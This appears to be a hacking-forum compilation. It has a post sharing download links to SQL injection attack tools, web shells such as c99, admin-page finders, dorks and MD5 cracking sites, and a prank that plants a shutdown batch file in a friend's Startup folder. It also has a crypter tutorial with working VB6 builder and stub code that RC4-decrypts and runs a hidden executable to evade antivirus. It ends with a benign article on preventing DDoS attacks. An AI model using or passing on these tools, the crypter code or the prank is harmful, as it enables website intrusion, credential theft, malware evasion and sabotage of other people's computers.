COMPLETE SQL INJECTION TOOLKITS

Hello everybody ,

Since i started learning SQLi , i have collected lots of good tools and documents , m still collecting more and more day by day as my scope of knowledge is increasing .
So thought of sharing what i have collected till now with everyone here,
My tool pack includes the following things.

DOWNLOADS :

SQLI SCANNER PACK : http://adf.ly/6tth
MD5 tools pack : http://adf.ly/6tuV
ADMIN FINDR : http://adf.ly/6tuk
SQLI TUTORIAL PACK : http://adf.ly/6tuw
DORKS PACK : http://adf.ly/6tv7
SHELLS PACK : http://adf.ly/6tvD

DONT DOWNLOAD IF YOU DONT KNOW WHAT ARE FALSE POSITIVE VIRUS ALERT

1) sqli scanner/automating injection pack :
contains 5 softwares for scanning ,and automating the hacking process

(a) Exploit scanner - for finding websites with dorks , and testing them for vulnerabilities.very famous
(b) Turkish ARTA - same as exploit scanner but not as famous bcos its turkish . i find it better then exploit scanner. but that my personal opinion
(c) Havij 1.12 free version : i guess everyone knows about it. it automates the process of performing sqli attack on any site.
it is extremely famous and efficient. but still it a tool :) nothing compared to manual process
(d) SQLI helper 2.7 : same like havij , but little fast .
(e)sqlinj Version 2 - another nice sql injection tool . i will write a tut later how to use this tool

2) ADMIN Finder pack :
After getting the login from the database . one needs to get the admin finder page. for some sites its very easy while for some site its hell ova tough
here are some nice admin finder tools and lists the u may use. but these tools are never enough .i will keep uploaing the amin finder lists as i get more

(a)reiiuke admin finder ( u can update the original admin finder lists with the list i am providing)
(b)5 perl and python admin finder tools/scripts. update them as per ur need
© misc softwre : admin pass locater , to brute force admin pass if u cant find it

YOU MIGHT ALSO LIKE THIS SITE
http://th3-0utl4ws.com/tools/admin-finder/

3) DORKS Pack : Contains many files containing more then 7000 dorks.

4) Shells : this pack contains many shells and source codes , like c99 ,c100 , jackal and hell ova more
( many shells like c99 are identified as Trojans by many antivirus. so u might find ur antivirus shouting about this pack. )
U might also wanna see this site :
http://www.kinginfet.net/shells/

5) MD5 cracking tools : although havij have md5 tool but for some reason it never worked for me . so this pack contains some tools .
ALSO THESE SITES WILL PROVE YOU GREAT HELP
http://www.md5decrypter.com/
http://www.md5decrypter.co.uk/
http://md5.rednoize.com/
http://md5decryption.com/
http://passcracking.com/
http://www.xmd5.org/
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org

6) SQLI tutorials pack : This pack contain complete html pages of sqli tutorails that i found useful from various forums and websites like hackforum , elitesoft ,warex , outlaws etc etc. i bet every newbe will love this pack .
u just need a firefox browser to open these html files.
NOTE: this pack also contain 2 of my own created sqli help files which i created myself, serves me as a very useful document whenever i m on to hack some site.

i will kept updating these packs as i learn and collect more and more 

* MAKE COMPUTER KEEP RESTARTING

MAKE COMPUTER KEEP RESTARTING


1.open notepad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension


4. Explanation,u have created a prog which shutdowns the pc with in 30
of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory



NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also make his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"


enjoy.... this is not a virus but look so....

CREATING A CRYPTER

How To Make a crypter ? What you will need: Visual Basic 6 or Visual Basic 6 Portable A RC4 module A brain The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial. TABLE OF CONTENTS:
1. Introduction 
2. Building your crypter
3. Conclusion 

INTRODUCTION

 RC4: In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). Stub: A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing. Builder: A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

 BUILDING YOUR CRYPTER

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub. Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it. Code: With commondlg 'CommonDialog1. .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe) .DialogTitle = "Please select a executable file..." 'The title of the dialog. .ShowOpen 'Show the dialog. End With TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename. The With commondlg command calls CommonDialog1. The .Filter part allows you to choose what files you only want to be selected. The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting). The .ShowOpen command shows the dialog. End With will end CommonDialog1. And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename. Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says. Code: Dim sStub As String, sFile As String 'This command will declare the two strings. Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub. sStub = Space(LOF(1)) 'This declares the space. Get #1, , sStub 'This puts in a space in the file. Close #1 'This closes the file. Open TextBox1.Text For Binary As #1 'Opens up the stub. sFile = Space(LOF(1)) 'This declares the space. Get #1, , sFile 'This puts a space in the file. Close #1 'This closes the file. Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe". Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option. Close #1 'This closes the file. MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file. Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding. Code: Const FileSplit = "<@#@>" 'The file split. Const Pass = "s0rasRC4Tutorial" 'The RC4 password. For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password. Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain: Code: Const FileSplit = "<@#@>" 'The file split. Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder! Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command. Public Sub Main() 'The main part of the stub. Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file. sStub = Space(LOF(1)) 'This will declare the space. Get #1, , sStub 'This puts a space in the file. Close #1 'This closes the file. sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub. Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder. Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password. Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder. End Sub 'This ends "Public Sub Main()". The code will be teaching you. Once you're done, remove the Form1.

CONCLUSION

I hope you liked this tutorial, and I hope you learned a lot about crypting Visual Basic 6 Portable

ABOUT DDOS ATTACK AND PREVENTION

Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!

Understanding DDOS Attack

A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.

Let’s understand the basic idea! Now, the attacker notifies all the computers present on the botnet to keep in touch with a particular site or a web server, time and again. This increases traffic on the network that causes in slowing down the speed of a site for the intended users. Unfortunately, at times the traffic can be really high that could even lead to shutting a site completely.

3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.

1. Buy More Bandwidth.

One of the easiest methods is to ensure that you have sufficient bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the requests. How does it help? Well, distributed denial of service is a nothing more than a game of capacity. Let’s suppose you have 10,000 computer systems each distributing 1 Mbps directed towards your way. This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!

So to avoid such issue, you need to apply the same rule intended for normal redundancy. According to this technique, if you wish to have more web servers just multiply around diverse datacenters and next make use of load balancing. By spreading your traffic to various servers will help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.

However, there’s a problem with this method that is buying more bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.

2. Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider having the largest DDoS protection and mitigation network, automated tools, and a pool of talented anti-DDoS technicians with the wherewithal to take action in real-time as per the varying DDoS attack characteristics. A viable alternative is to utilize a DDoS prevention appliance, which is specifically intended to discover and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

In case you have computer systems that are connected to the web directly, a better idea is to properly install/configure your routers and firewall so as to limit the connectivity. For an instance, while receiving some data from a client machine you can only allow traffic to pass from the machine only on a few chosen ports (like HTTP, POP, SMTP etc.) via the firewall.

Wrapping Up!

Websites are largely getting attacked by hackers every second. Denial-of-service attack is insanely getting huge and is creating a lot of problems for business organizations having strong online vicinity. In this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks. Aforementioned are three tips that I’ll recommend you to run through to at least understand where to get started towards building a resilient web network with chances of surviving a DDoS attack.